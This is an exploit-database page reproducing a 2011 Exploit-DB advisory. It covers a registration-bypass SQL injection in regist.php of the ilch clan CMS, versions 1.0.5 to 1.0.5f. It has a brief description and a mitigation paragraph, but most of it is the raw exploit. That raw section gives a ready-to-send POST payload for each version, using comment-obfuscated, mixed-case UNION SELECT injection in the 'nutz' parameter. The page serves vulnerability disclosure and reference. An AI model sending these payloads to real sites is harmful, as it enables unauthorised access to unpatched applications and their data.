header-logo
Suggest Exploit
vendor:
ilch clan
by:
Easy Laster
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ilch clan
Affected Version From: 1.0.5 a,b,c,d,e,f!
Affected Version To: 1.0.5 a,b,c,d,e,f!
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Registration Bypass SQL Injection Vulnerability

A SQL Injection vulnerability was discovered in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php, which allows attackers to bypass the registration process. The vulnerability is caused by improper validation of user-supplied input in the $_POST parameter. An attacker can exploit this vulnerability to gain access to the application without registering.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized and validated. Additionally, access control should be implemented to ensure that only authorized users are able to access the application.
Source

Exploit-DB raw data:

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
/                                  _____ _      _                                       \ 
\                                  \_   \ | ___| |__                                    /
/                                   / /\/ |/ __| '_ \                                   \
\                                /\/ /_ | | (__| | | |                                  /
/                                \____/ |_|\___|_| |_|                                  \
\               Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php            /
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-                
                                         by
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/                                                                                       \ 
\ ___ ___ ___ ___                         _ _           _____           _         _     /
/| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_   \
\|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|  /
/  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|    \
\                                              |___|                 |___|              /
/                                                                                       \
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f! 
        Vulnerability Name : Registration Bypass SQL Injection Vulnerability 
                                 Date : 02.04.2011
                             SQL Injection method : $_POST   
                              Discovered by : Easy Laster
Security Group :Team-Internet,Undergroundagents,websec-empire.to and 4004-Security-Project.com
                               Greetings to free-hack.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                                      Security Flaws
                                 =-=-=-=-=-=-=-=-=-=-=-=
                                     ilch clan 1.0.5
checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa
                                     ilch clan 1.0.5a
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa
                                     ilch clan 1.0.5b
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa
                                     ilch clan 1.0.5c
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa
                                     ilch clan 1.0.5d
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa
                                     ilch clan 1.0.5e
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
                                     ilch clan 1.0.5f
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa

Navigation

Suggest Exploit

Services By CQR